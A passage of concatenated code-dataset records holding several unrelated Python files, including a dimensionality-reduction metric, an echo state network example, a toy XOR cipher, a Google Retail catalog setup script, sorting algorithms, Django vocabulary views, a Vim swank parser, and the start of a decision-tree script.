data.\n \n Parameters\n ----------\n data_scaled : numpy.ndarray\n A matrix with the scaled data to transform\n\n labels : numpy.ndarray\n Labels to assign to the transformed data (0 for real and 1 for synthetic)\n\n Returns\n -------\n pandas.core.frame.DataFrame\n a dataframe with the transformed data labelled\n \"\"\"\n\n #initialize dataframe to save the values of the transformation\n iso_df = pd.DataFrame(columns=['PC1','PC2','Label'])\n \n #loop to iterate over all batches of data\n for (b, y) in zip(batch(data_scaled,10000),batch(labels,10000)) :\n\n #transform the batch of data\n iso_transform = Isomap(n_components=2).fit_transform(b)\n\n #append the labels of the data\n iso = np.append(iso_transform, y, axis=1)\n\n #append the transformation of the actual batch to the dataframe that contains the transformation of all the batches\n iso = pd.DataFrame(data=iso, columns=['PC1','PC2','Label'])\n iso_df = iso_df.append(iso, ignore_index=True)\n\n #return a dataframe with the transformed data\n return iso_df\n\n\ndef dra_distance(real,synthetic) :\n\n \"\"\"Compute the proposed DRA distance, which is a distance metric that indicates the distance between two dimensionality dimension plots. 
The metric is the joint distance between the baricenters distance and spread distance.\n \n Parameters\n ----------\n real : pandas.core.frame.DataFrame\n A dataframe with the dimensionality results (PCA or ISOMAP) of the real data.\n \n synthetic: pandas.core.frame.DataFrame\n A dataframe with the dimensionality results (PCA or ISOMAP) of the synthetic data.\n\n Returns\n -------\n numpy.float64\n the computed DRA distance metric.\n \"\"\"\n \n #compute baricenters distance\n bc_real=np.mean(real[['PC1','PC2']].values)\n bc_synth=np.mean(synthetic[['PC1','PC2']].values)\n dist_real_synth = np.linalg.norm(bc_real - bc_synth)\n \n #compute spread distance\n spread_real=np.std(real[['PC1','PC2']].values)\n spread_synth=np.std(synthetic[['PC1','PC2']].values)\n dist_spread_real_synth = np.abs(spread_real-spread_synth)\n \n #compute joint distance\n alpha=0.05\n return np.round(alpha*dist_real_synth + (1-alpha)*dist_spread_real_synth,4)\n\n","sub_path":"EVALUATION FUNCTIONS/RESEMBLANCE/dimensional_resemblance.py","file_name":"dimensional_resemblance.py","file_ext":"py","file_size_in_byte":5975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"249362903","text":"import torch.nn\nimport numpy as np\nimport sys\nsys.path.append('../')\nimport DataLoad\n\nfrom torchesn.nn import ESN\nfrom torchesn import utils\nimport time\n\ndevice = torch.device('cuda')\ndtype = torch.double\ntorch.set_default_dtype(dtype)\ndataset='Mackey_glass'\n[X_data,Y_data]=DataLoad.FilesLoad(dataset)\n\nX_data = torch.from_numpy(X_data).to(device)\nY_data = torch.from_numpy(Y_data).to(device)\n\ntrX = X_data[:5000]\ntrY = Y_data[:5000]\ntsX = X_data[5000:]\ntsY = Y_data[5000:]\n\nwashout = [500]\ninput_size = output_size = 1\nhidden_size = 500\nloss_fcn = torch.nn.MSELoss()\n\nif __name__ == \"__main__\":\n start = time.time()\n\n # Training\n trY_flat = utils.prepare_target(trY.clone(), [trX.size(0)], washout)\n\n model = ESN(input_size, hidden_size, output_size)\n model.to(device)\n\n model(trX, washout, None, trY_flat)\n model.fit()\n output, hidden = model(trX, washout)\n print(\"Training error:\", loss_fcn(output, trY[washout[0]:]).item())\n\n # Test\n output, hidden = model(tsX, [0], hidden)\n print(\"Test error:\", loss_fcn(output, tsY).item())\n print(\"Ended in\", time.time() - start, \"seconds.\")","sub_path":"examples/mackey-glass.py","file_name":"mackey-glass.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"127172963","text":"import binascii\n\n\ndef encfunction(text):\n enclist = [b^11 for b in text]\n return enclist\ndef decfunction(text):\n declist = [b^11 for b in text]\n return declist\n\n\nwhile(True):\n word = input(\"enter a message: \\n\")\n action = input(\"enter 'e' to encrypt, 'd' to decrypt:\\n \")\n if action == 'e':\n print(\"Encrypting...\")\n utf8 = binascii.hexlify(word.encode(\"utf8\"))\n print(bytes(encfunction(utf8))) # הופך רשימה של אינטים חזרה לבייטים\n\n elif action == 'd':\n word = bytes(word, 'utf-8')\n print(\"Decrypting...\")\n utf8 = decfunction(word)\n print(binascii.unhexlify(utf8).decode(\"utf8\"))\n print(bytes(encfunction(utf8)))\n print(type(word))\n else:\n print(\"try again\")\n","sub_path":"Project/testencryption3.py","file_name":"testencryption3.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"307380581","text":"import 
random\nimport string\nimport time\n\nfrom google.api_core.client_options import ClientOptions\nfrom google.cloud.retail_v2 import SearchServiceClient, Product, PriceInfo, ColorInfo, \\\n    ProductServiceClient, CreateProductRequest, DeleteProductRequest, CustomAttribute, FulfillmentInfo\nfrom google.protobuf.field_mask_pb2 import FieldMask\n\nproject_number = \"SET HERE VALID PROJECT NUMBER\"\nendpoint = \"retail.googleapis.com\"\nisolation_filter_key = \"INTEGRATION_FILTER_KEY\"\ntitle_query = \"Nest_Maxi\"\nvisitor_id = \"visitor\"\ntest_id = ''.join(random.sample(string.ascii_lowercase, 1))\n\n# [START search_client]\ndefault_catalog = \"projects/{0}/locations/global/catalogs/default_catalog/branches/0\".format(project_number)\ndefault_search_placement = \"projects/\" + project_number + \"/locations/global/catalogs/default_catalog/placements/default_search\"\ncreated_products = []\n\n\ndef get_search_service_client():\n    client_options = ClientOptions(endpoint)\n    return SearchServiceClient(client_options=client_options)\n\n\n# [END search_client]\n\n# [START ingesting products for search]\ndef get_product_service_client():\n    client_options = ClientOptions(endpoint)\n    return ProductServiceClient(client_options=client_options)\n\n\ndef get_primary_products():\n    products = []\n    product1 = Product()\n    product2 = Product()\n\n    price_info1 = PriceInfo()\n    price_info1.price = 20.0\n    price_info1.original_price = 25.0\n    price_info1.cost = 10.0\n    price_info1.currency_code = \"USD\"\n\n    color_info1 = ColorInfo()\n    color_info1.color_families = [\"black\"]\n    color_info1.colors = [\"carbon\"]\n\n    fulfillment_info1 = FulfillmentInfo()\n    fulfillment_info1.type_ = \"pickup-in-store\"\n    fulfillment_info1.place_ids = [\"store1\", \"store2\"]\n\n    field_mask1 = FieldMask(paths=[\"title\", \"categories\", \"price_info\", \"color_info\"])\n\n    product1.title = \"Nest_Maxi\"\n    product1.categories = [\"Nest > speakers and displays\"]\n    product1.uri = \"https://uri.com\"\n    product1.brands = [\"Google\"]\n    product1.price_info = price_info1\n    product1.color_info = color_info1\n    product1.fulfillment_info = [fulfillment_info1]\n    product1.retrievable_fields = field_mask1\n\n    price_info2 = PriceInfo()\n    price_info2.price = 15.0\n    price_info2.original_price = 20.0\n    price_info2.cost = 5.0\n    price_info2.currency_code = \"USD\"\n\n    color_info2 = ColorInfo()\n    color_info2.color_families = [\"blue\"]\n    color_info2.colors = [\"sky\"]\n\n    fulfillment_info2 = FulfillmentInfo()\n    fulfillment_info2.type_ = \"pickup-in-store\"\n    fulfillment_info2.place_ids = [\"store2\", \"store3\"]\n\n    field_mask2 = FieldMask(paths=[\"title\", \"categories\", \"price_info\", \"color_info\"])\n\n    product2.title = \"Nest_Maxi\"\n    product2.categories = [\"Nest > speakers and displays\"]\n    product2.uri = \"https://uri.com\"\n    product2.brands = [\"Google\"]\n    product2.price_info = price_info2\n    product2.color_info = color_info2\n    product2.fulfillment_info = [fulfillment_info2]\n    product2.retrievable_fields = field_mask2\n\n    products.append(product1)\n    products.append(product2)\n    return products\n\n\ndef get_variant():\n    variant = Product()\n\n    fulfillment_info = FulfillmentInfo()\n    fulfillment_info.type_ = \"ship-to-store\"\n    fulfillment_info.place_ids = [\"store123\"]\n\n    variant.type_ = Product.Type.VARIANT\n    variant.title = \"Nest_Maxi_variant1\"\n    variant.uri = \"https://uri.com\"\n    variant.fulfillment_info = [fulfillment_info]\n\n    return variant\n\n\ndef create_product_for_search(products: [Product], test__id: str):\n    for product in 
products:\n        attribute = CustomAttribute()\n        attribute.text = test__id\n        attribute.indexable = True\n        isolation_filter = {isolation_filter_key: attribute}\n        product.attributes = isolation_filter\n        product_client = get_product_service_client()\n        create_request = CreateProductRequest()\n        create_request.product = product\n        create_request.parent = default_catalog\n        create_request.product_id = '{0}_{1}'.format(product.title, get_random_id())\n        created_product = product_client.create_product(request=create_request)\n        print(create_request)\n        variant = get_variant()\n        variant.primary_product_id = created_product.id\n        create_request.product = variant\n        create_request.product_id = '{0}_{1}'.format(variant.title, get_random_id())\n        created_variant = product_client.create_product(request=create_request)\n        print(create_request)\n        created_products.append(created_product)\n        created_products.append(created_variant)\n\n    return created_products\n\n\ndef delete_ingested_products(products: [Product]):\n    product_client = get_product_service_client()\n    types = [Product.Type.VARIANT, Product.Type.PRIMARY]\n    for _type in types:\n        for product in products:\n            if product.type_.__eq__(_type):\n                delete_request = DeleteProductRequest()\n                delete_request.name = product.name\n                product_client.delete_product(request=delete_request)\n\n\ndef get_random_id():\n    return ''.join(random.sample(string.ascii_lowercase, 10))\n\n\ndef build_isolation_filter(test__id: str):\n    return 'attributes.{0}: ANY(\"{1}\")'.format(isolation_filter_key, test__id)\n\n\n# [END ingesting products for search]\n\n\ndef ingest_products(test__id: str):\n    print(\"---ingesting products to catalog---\")\n    create_product_for_search(get_primary_products(), test__id)\n    print(\"---wait for ingested products to be indexed in catalog---\")\n    time.sleep(10)\n\n\ndef delete_products():\n    print(\"---removing ingested products---\")\n    delete_ingested_products(created_products)\n    print(\"---products removed---\")\n","sub_path":"setup_catalog.py","file_name":"setup_catalog.py","file_ext":"py","file_size_in_byte":5693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"646032926","text":"def SelectionSort(nums:list):\n    n = len(nums)\n    for i in range(n):\n        for j in range(i,n):\n            if(nums[i] > nums[j]):\n                nums[i],nums[j] = nums[j],nums[i]\n    return nums\n\n#O(n^2), unstable, in-place sort\n\ndef bubbleSort(nums:list):\n    n = len(nums)\n    for c in range(n):\n        for i in range(1,n-c):\n            if(nums[i-1] > nums[i]):\n                nums[i],nums[i-1] = nums[i-1],nums[i]\n    return nums\n\n#O(n^2), stable, in-place sort\n\ndef insertSort(nums:list):\n    n = len(nums)\n    for i in range(1,n):\n        while(i>0 and nums[i-1] > nums[i]):\n            nums[i-1],nums[i] = nums[i],nums[i-1]\n            i -= 1\n    return nums\n\n#O(n^2), stable, in-place sort\n\ndef shellSort(nums:list):\n    n = len(nums)\n    gap = n // 2\n    while gap:\n        for i in range(gap,n):\n            while (i-gap >= 0 and nums[i-gap] > nums[i]):\n                nums[i-gap],nums[i] = nums[i],nums[i-gap]\n                i -= gap\n        gap //= 2\n    return nums\n\n#Lower bound is n*log2(n); performs well at medium scale; worst-case and average-case efficiency do not differ much\n# Average O(nlogn), worst O(n^2), unstable, in-place sort\n\ndef MergeSort(nums:list):\n    def merge(left,right):\n        res = []\n        i = 0\n        j = 0\n        while(i < len(left) and j < len(right)):\n            if left[i] <= right[j]:\n                res.append(left[i])\n                i += 1\n            else:\n                res.append(right[j])\n                j += 1\n        res += left[i:]\n        res += right[j:]\n        return res\n\n    if len(nums) <= 1:\n        return nums\n    mid = len(nums) // 2\n    left = MergeSort(nums[:mid])\n    right = MergeSort(nums[mid:])\n    return merge(left,right)\n\n# O(nlogn), stable, out-of-place sort\n\ndef quickSort(nums:list):\n    n = len(nums)\n\n    def 
quick(left,right):\n        if left >= right:\n            return nums\n        pivot = left\n        i = left\n        j = right\n        while(i < j):\n            while(i < j and nums[j] > nums[pivot]):\n                j -= 1\n            while(i < j and nums[i] <= nums[pivot]):\n                i += 1\n            nums[i],nums[j] = nums[j],nums[i]\n        nums[pivot],nums[j] = nums[j],nums[pivot]\n        quick(left,j-1)\n        quick(j+1,right)\n        return nums\n\n    return quick(0,n-1)\n\n#Unstable, in-place sort; time complexity O(nlogn)\n\ndef heapSort(nums:list):\n    n = len(nums)\n\n    def adjust_heap_recur(nums, startpos, endpos):\n        pos = startpos\n        childpos = pos * 2 +1\n        if childpos < endpos:\n            rightpos = childpos + 1\n            if rightpos < endpos and nums[rightpos] > nums[childpos]:\n                childpos = rightpos\n            if nums[childpos] > nums[pos]:\n                nums[pos],nums[childpos] = nums[childpos],nums[pos]\n                adjust_heap_recur(nums,childpos,endpos)\n\n    def adjust_heap_norecur(nums, startpos, endpos):\n        newitem = nums[startpos]\n        pos = startpos\n        childpos = pos * 2 + 1\n        while childpos < endpos:\n            rightpos = childpos + 1\n            if rightpos < endpos and nums[rightpos] >= nums[childpos]:\n                childpos = rightpos\n            if newitem < nums[childpos]:\n                nums[pos] = nums[childpos]\n                pos = childpos\n                childpos = pos * 2 + 1\n            else:\n                break\n        nums[pos] = newitem\n\n#build the heap\n    for i in reversed(range(n//2)):\n        adjust_heap_recur(nums,i,n)\n#adjust the heap\n    for i in range(n-1,-1,-1):\n        nums[0],nums[i] = nums[i],nums[0]\n        adjust_heap_recur(nums,0,i)\n    return nums\n\n#Unstable, in-place sort; time complexity O(nlogn)\n\ndef countSort(nums:list):\n    if not nums: return[]\n    n = len(nums)\n    _min = min(nums)\n    _max = max(nums)\n    tmp_arr = [0] * (_max - _min + 1)\n    for num in nums:\n        tmp_arr[num - _min] += 1\n    j = 0\n    for i in range(n):\n        while tmp_arr[j] == 0:\n            j += 1\n        nums[i] = j + _min\n        tmp_arr[j] -= 1\n    return nums\n\n# Stable, out-of-place sort; time complexity O(n+k),\n# but for arrays with a large value range it needs a lot of time and memory.\n# A typical space-for-time trade-off algorithm\n\ndef bucketSort(nums:list,bucketSize:int):\n    if len(nums) < 2:\n        return nums\n    _min = min(nums)\n    _max = max(nums)\n    # number of buckets needed\n    bucketNum = (_max - _min) // bucketSize + 1\n    buckets = [[] for _ in range(bucketNum)]\n    for num in nums:\n        # put into the corresponding bucket\n        buckets[(num - _min) // bucketSize].append(num)\n    res = []\n\n    for bucket in buckets:\n        if not bucket: continue\n        if bucketSize == 1:\n            res.extend(bucket)\n        else:\n            # if everything lands in one bucket, the bucket size is too large\n            if bucketNum == 1:\n                bucketSize -= 1\n            res.extend(bucketSort(bucket, bucketSize))\n    return res\n\n#Stable, out-of-place sort; time complexity O(n+k), where k is the number of buckets\n\ndef Radix_sort(nums):\n    if not nums: return []\n    _max = max(nums)\n    # number of digits of the maximum\n    maxDigit = len(str(_max))\n    bucketList = [[] for _ in range(10)]\n    # sort starting from the least significant digit\n    div, mod = 1, 10\n    for i in range(maxDigit):\n        for num in nums:\n            bucketList[num % mod // div].append(num)\n        div *= 10\n        mod *= 10\n        idx = 0\n        for j in range(10):\n            for item in bucketList[j]:\n                nums[idx] = item\n                idx += 1\n            bucketList[j] = []\n    return nums\n\n# Stable, out-of-place sort; time complexity posCount*(n+n)\n# where posCount is the number of digits of the largest element\n# which simplifies to O(k*n), where k is a constant and n is the number of elements.\n\n\n# nums = [4,3,2,6,5,6,2,7,5,8,4]\n\n# print(quickSort(nums))","sub_path":"TenSort.py","file_name":"TenSort.py","file_ext":"py","file_size_in_byte":5693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"268899092","text":"# -*- coding: utf-8 -*-\n\nfrom django.conf import settings\nfrom django.contrib import messages\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404\nfrom django.shortcuts import render_to_response\nfrom django.utils.translation import ugettext as _\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import 
Paginator, EmptyPage, PageNotAnInteger\n\nfrom deutschlernen.vocabulary.models import Vocabulary\nfrom deutschlernen.vocabulary.forms import VocabularyAddForm\n\n@login_required\ndef index(request):\n #output = {}\n #output['menutop'] = \"vocabulary\"\n #return render_to_response('vocabulary/index.html', output, context_instance=RequestContext(request));\n \n return HttpResponseRedirect('/vocabulary/list/')\n\n\n@login_required\ndef add(request):\n output = {}\n\n if request.method == 'POST':\n form = VocabularyAddForm(request.POST)\n if form.is_valid():\n article = form.cleaned_data['article']\n word = form.cleaned_data['word']\n translation = form.cleaned_data['translation']\n category = form.cleaned_data['category']\n\n vocabulary, created = Vocabulary.objects.get_or_create(word=word, defaults = { 'article': article, 'translation': translation, 'category': category })\n\n if created is False:\n messages.error(request, _('Can\\'t add this word, it already exists in the database'))\n\n else:\n messages.success(request, _('A word \\'%(article)s %(word)s\\' has been added correctly') % { 'article': vocabulary.get_article_display(), 'word': vocabulary.word })\n\n else:\n form = VocabularyAddForm()\n \n output['form'] = form\n output['menutop'] = \"vocabulary\"\n output['submenu'] = \"add\"\n return render_to_response('vocabulary/add_edit.html', output, context_instance=RequestContext(request));\n\n@login_required\ndef article(request, id=None):\n output = {}\n\n if id is None:\n vocabulary = Vocabulary.objects.all().order_by('?')[0]\n else:\n vocabulary = get_object_or_404(Vocabulary, pk=id)\n\n if request.method == 'POST':\n article = request.POST.get('article', '')\n\n if article == vocabulary.get_article_display():\n messages.success(request, _(\"Correct! %(article)s %(word)s\") % { 'article': vocabulary.get_article_display(), 'word': vocabulary.word })\n output['result'] = \"OK\"\n else:\n messages.error(request, _(\"Bad response! Try once more.\"))\n output['result'] = \"ERROR\"\n\n output['vocabulary'] = vocabulary\n output['menutop'] = \"vocabulary\"\n output['submenu'] = \"article\"\n return render_to_response('vocabulary/article.html', output, context_instance=RequestContext(request));\n\n@login_required\ndef translations(request, id=None):\n output = {}\n\n if id is None:\n vocabulary = Vocabulary.objects.all().order_by('?')[0]\n else:\n vocabulary = get_object_or_404(Vocabulary, pk=id)\n\n if request.method == 'POST':\n translation = request.POST.get('translation', '')\n\n if translation == vocabulary.translation:\n messages.success(request, _(\"Success! The correct translation of \\'%(article)s %(word)s\\' is \\'%(translation)s\\'\") % { 'article': vocabulary.get_article_display(), 'word': vocabulary.word, 'translation': translation })\n output['result'] = \"OK\"\n else:\n messages.error(request, _(\"Bad response! 
Try once more.\"))\n output['result'] = \"ERROR\"\n\n output['vocabulary'] = vocabulary\n output['menutop'] = \"vocabulary\"\n output['submenu'] = \"translations\"\n return render_to_response('vocabulary/translations.html', output, context_instance=RequestContext(request));\n\n@login_required\ndef list(request):\n output = {}\n\n vocabularies = Vocabulary.objects.all().order_by(\"word\")\n\n paginator = Paginator(vocabularies, settings.RESULTS_PER_PAGE)\n\n page = request.GET.get('page')\n\n try:\n vocabularies = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n vocabularies = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n vocabularies = paginator.page(paginator.num_pages)\n\n output['objects_list'] = vocabularies\n output['paginator'] = paginator\n output['menutop'] = \"vocabulary\"\n output['submenu'] = \"list\"\n return render_to_response('vocabulary/list.html', output, context_instance=RequestContext(request));\n\n@login_required\ndef edit(request, id):\n output = {}\n\n vocabulary = get_object_or_404(Vocabulary, pk=id)\n\n if request.method == 'POST':\n form = VocabularyAddForm(request.POST)\n if form.is_valid():\n article = form.cleaned_data['article']\n word = form.cleaned_data['word']\n translation = form.cleaned_data['translation']\n category = form.cleaned_data['category']\n\n vocabulary.article = article\n vocabulary.word = word\n vocabulary.translation = translation\n vocabulary.category = category\n vocabulary.save()\n\n messages.success(request, _('A word has been edited correctly'))\n\n return HttpResponseRedirect('/vocabulary/list/')\n else:\n form = VocabularyAddForm(initial={ 'word': vocabulary.word, 'article': vocabulary.article, 'translation': vocabulary.translation, 'category': vocabulary.category })\n \n output['form'] = form\n output['menutop'] = \"vocabulary\"\n output['submenu'] = \"list\"\n output['edit'] = True\n return render_to_response('vocabulary/add_edit.html', output, context_instance=RequestContext(request));\n\n@login_required\ndef delete(request, id):\n vocabulary = get_object_or_404(Vocabulary, pk=id)\n\n vocabulary.delete()\n\n messages.success(request, _('A word has been removed correctly'))\n return HttpResponseRedirect('/vocabulary/list/')\n\n\n@login_required\ndef opposites(request):\n output = {}\n output['menutop'] = \"vocabulary\"\n output['submenu'] = \"opposites\"\n return render_to_response('vocabulary/opposites.html', output, context_instance=RequestContext(request));\n\n","sub_path":"deutschlernen/vocabulary/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"147501533","text":"import vim\n\nfrom utils import logtime, logprint, unicode_len, unquote, parse_filepos, format_filename \n###############################################################################\n# Swank server interface\n###############################################################################\n\ndef swank_parse_inspect_content(pcont):\n \"\"\"\n Parse the swank inspector content\n \"\"\"\n global inspect_lines\n global inspect_newline\n\n if type(pcont[0]) != list:\n return\n vim.command('setlocal modifiable')\n buf = vim.current.buffer\n help_lines = int( vim.eval('exists(\"b:help_shown\") ? 
len(b:help) : 1') )\n pos = help_lines + inspect_lines\n buf[pos:] = []\n istate = pcont[1]\n start = pcont[2]\n end = pcont[3]\n lst = []\n for el in pcont[0]:\n # logprint(str(el))\n newline = False\n if type(el) == list:\n if el[0] == ':action':\n text = '{<' + unquote(el[2]) + '> ' + unquote(el[1]) + ' <>}'\n else:\n text = '{[' + unquote(el[2]) + '] ' + unquote(el[1]) + ' []}'\n lst.append(text)\n else:\n text = unquote(el)\n lst.append(text)\n if text == \"\\n\":\n newline = True\n lines = \"\".join(lst).split(\"\\n\")\n if inspect_newline or pos > len(buf):\n buf.append(lines)\n else:\n buf[pos-1] = buf[pos-1] + lines[0]\n buf.append(lines[1:])\n inspect_lines = len(buf) - help_lines\n inspect_newline = newline\n if int(istate) > int(end):\n # Swank returns end+1000 if there are more entries to request\n buf.append(['', \"[--more--]\", \"[--all---]\"])\n inspect_path = vim.eval('s:ctx.inspect_path')\n if len(inspect_path) > 1:\n buf.append(['', '[<<] Return to ' + ' -> '.join(inspect_path[:-1])])\n else:\n buf.append(['', '[<<] Exit Inspector'])\n if int(istate) > int(end):\n # There are more entries to request\n # Save current range for the next request\n vim.command(\"let b:range_start=\" + start)\n vim.command(\"let b:range_end=\" + end)\n vim.command(\"let b:inspect_more=\" + end)\n else:\n # No ore entries left\n vim.command(\"let b:inspect_more=0\")\n vim.command('call slimv#endUpdate()')\n\ndef swank_parse_inspect(struct):\n \"\"\"\n Parse the swank inspector output\n \"\"\"\n global inspect_lines\n global inspect_newline\n\n vim.command('call slimv#inspect#open()')\n vim.command('setlocal modifiable')\n buf = vim.current.buffer\n title = parse_plist(struct, ':title')\n vim.command('let b:inspect_title=\"' + title + '\"')\n buf[:] = ['Inspecting ' + title, '--------------------', '']\n vim.command('normal! 
3G0')\n vim.command('call slimv#buffer#help(2)')\n pcont = parse_plist(struct, ':content')\n inspect_lines = 3\n inspect_newline = True\n swank_parse_inspect_content(pcont)\n vim.command('call slimv#inspect#setPos(\"' + title + '\")')\n\ndef swank_parse_debug(struct):\n \"\"\"\n Parse the SLDB output\n \"\"\"\n vim.command('call slimv#debug#openSldb()')\n vim.command('setlocal modifiable')\n buf = vim.current.buffer\n [thread, level, condition, restarts, frames, conts] = struct[1:7]\n buf[:] = [l for l in (unquote(condition[0]) + \"\\n\" + unquote(condition[1])).splitlines()]\n buf.append(['', 'Restarts:'])\n for i in range( len(restarts) ):\n r0 = unquote( restarts[i][0] )\n r1 = unquote( restarts[i][1] )\n r1 = r1.replace(\"\\n\", \" \")\n buf.append([str(i).rjust(3) + ': [' + r0 + '] ' + r1])\n buf.append(['', 'Backtrace:'])\n for f in frames:\n frame = str(f[0])\n ftext = unquote( f[1] )\n ftext = ftext.replace('\\n', '')\n ftext = ftext.replace('\\\\\\\\n', '')\n buf.append([frame.rjust(3) + ': ' + ftext])\n vim.command('call slimv#endUpdate()')\n vim.command(\"call search('^Restarts:', 'w')\")\n vim.command('stopinsert')\n # This text will be printed into the REPL buffer\n return unquote(condition[0]) + \"\\n\" + unquote(condition[1]) + \"\\n\"\n\ndef swank_parse_xref(struct):\n \"\"\"\n Parse the swank xref output\n \"\"\"\n buf = ''\n for e in struct:\n buf = buf + unquote(e[0]) + ' - ' + parse_location(e[1]) + '\\n'\n return buf\n\n\ndef swank_parse_list_breakpoints(tl):\n vim.command('call slimv#buffer#open(\"BREAKPOINTS\")')\n vim.command('setlocal modifiable')\n buf = vim.current.buffer\n buf[:] = ['Breakpoints', '--------------------']\n # vim.command('call slimv#buffer#help(2)')\n buf.append(['', 'Idx ID File Line Enbled?', \\\n '---- --- ---------------------------- ----- -------'])\n vim.command('normal! G0')\n lst = tl[1]\n headers = lst.pop(0)\n # logprint(str(lst))\n idx = 0\n for t in lst:\n # t is a tuple of: \n # ((:id :file :line :enabled)\n state = unquote(t[2])\n name = unquote(t[1])\n buf.append([\"%3d: %3s %20s %6s %s\" % (idx, t[0], t[1], t[2], t[3])])\n idx = idx + 1\n vim.command('normal! j')\n vim.command('call slimv#endUpdate()')\n\n\ndef swank_parse_list_threads(swank, tl):\n vim.command('call slimv#thread#open()')\n vim.command('setlocal modifiable')\n buf = vim.current.buffer\n buf[:] = ['Threads in pid '+swank.pid, '--------------------']\n vim.command('call slimv#buffer#help(2)')\n buf.append(['', 'Idx ID Status Name Priority', \\\n '---- ------ ------------ ---------------------------- ---------'])\n vim.command('normal! G0')\n lst = tl[1]\n headers = lst.pop(0)\n # logprint(str(lst))\n idx = 0\n for t in lst:\n priority = ''\n if len(t) > 3:\n priority = unquote(t[3])\n\n # t is a tuple of: \n # (:id :name :state :at-breakpoint? :suspended? :suspends) \n try:\n id = \"%5d\" % int(t[0])\n except ValueError:\n id = \" \"*5 \n\n state = unquote(t[2])\n name = unquote(t[1])\n buf.append([\"%3d: %s %-15s %-29s %s\" % (idx, id, state, name, priority)])\n idx = idx + 1\n vim.command('normal! 
j')\n vim.command('call slimv#endUpdate()')\n\ndef swank_parse_frame_call(struct, action):\n \"\"\"\n Parse frame call output\n \"\"\"\n vim.command('call slimv#gotoFrame(' + action.data + ')')\n vim.command('setlocal modifiable')\n buf = vim.current.buffer\n win = vim.current.window\n line = win.cursor[0]\n if type(struct) == list:\n buf[line:line] = [struct[1][1]]\n else:\n buf[line:line] = ['No frame call information']\n vim.command('call slimv#endUpdate()')\n\ndef swank_parse_frame_source(struct, action):\n \"\"\"\n Parse frame source output\n http://comments.gmane.org/gmane.lisp.slime.devel/9961 ;-(\n 'Well, let's say a missing feature: source locations are currently not available for code loaded as source.'\n \"\"\"\n vim.command('call slimv#gotoFrame(' + action.data + ')')\n vim.command('setlocal modifiable')\n buf = vim.current.buffer\n win = vim.current.window\n line = win.cursor[0]\n if type(struct) == list and len(struct) == 4:\n if struct[1] == 'nil':\n [lnum, cnum] = [int(struct[2][1]), 1]\n fname = 'Unknown file'\n else:\n [lnum, cnum] = parse_filepos(unquote(struct[1][1]), int(struct[2][1]))\n fname = format_filename(struct[1][1])\n if lnum > 0:\n s = ' in ' + fname + ' line ' + str(lnum)\n else:\n s = ' in ' + fname + ' byte ' + struct[2][1]\n slines = s.splitlines()\n if len(slines) > 2:\n # Make a fold (closed) if there are too many lines\n slines[ 0] = slines[ 0] + '{{{'\n slines[-1] = slines[-1] + '}}}'\n buf[line:line] = slines\n vim.command(str(line+1) + 'foldclose')\n else:\n buf[line:line] = slines\n else:\n buf[line:line] = [' No source line information']\n vim.command('call slimv#endUpdate()')\n\ndef swank_parse_locals(swank, struct, action):\n \"\"\"\n Parse frame locals output\n \"\"\"\n frame_num = action.data\n vim.command('call slimv#gotoFrame(' + frame_num + ')')\n vim.command('setlocal modifiable')\n buf = vim.current.buffer\n win = vim.current.window\n line = win.cursor[0]\n if type(struct) == list:\n lines = ' Locals:'\n num = 0\n for f in struct:\n name = parse_plist(f, ':name')\n id = parse_plist(f, ':id')\n value = parse_plist(f, ':value')\n lines = lines + '\\n ' + name + ' = ' + value\n # Remember variable index in frame\n swank.frame_locals[str(frame_num) + \" \" + name] = num\n num = num + 1\n else:\n lines = ' No locals'\n buf[line:line] = lines.split(\"\\n\")\n vim.command('call slimv#endUpdate()')\n\ndef parse_plist(lst, keyword):\n for i in range(0, len(lst), 2):\n if keyword == lst[i]:\n return unquote(lst[i+1])\n return ''\n\n","sub_path":"python2/swank/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":9015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"566792777","text":"import csv\nimport sys\nimport time\nimport numpy as np\n#import matplotlib.pyplot as plt \n\nimport pickle\n\n\n#start = time.time()\n# Timing Start\n\n# Function to check, if node is unique to make classification\ndef unique_data_labels(data):\n count=len(np.unique(data[:,-1]))\n if(count==1):\n return 1\n else:\n return 0\n# Function to Make classifciation, based on majority classification model\ndef classify_data_labels(data):\n array,counts=np.unique(data[:,-1],return_counts=True)\n tmp=np.argmax(counts)\n predicted_label=array[tmp]\n \n return predicted_label\n# Function to calucate overall system entropy\ndef data_entropy(data):\n array,counts=np.unique(data[:,-1],return_counts=True)\n Pr_array=counts/float(np.sum(counts))\n entropy=-np.sum(Pr_array*(np.log2(Pr_array)))\n\n return entropy\n# 
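Weighted average of the child-node entropies; used by information_gain below.\n# 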
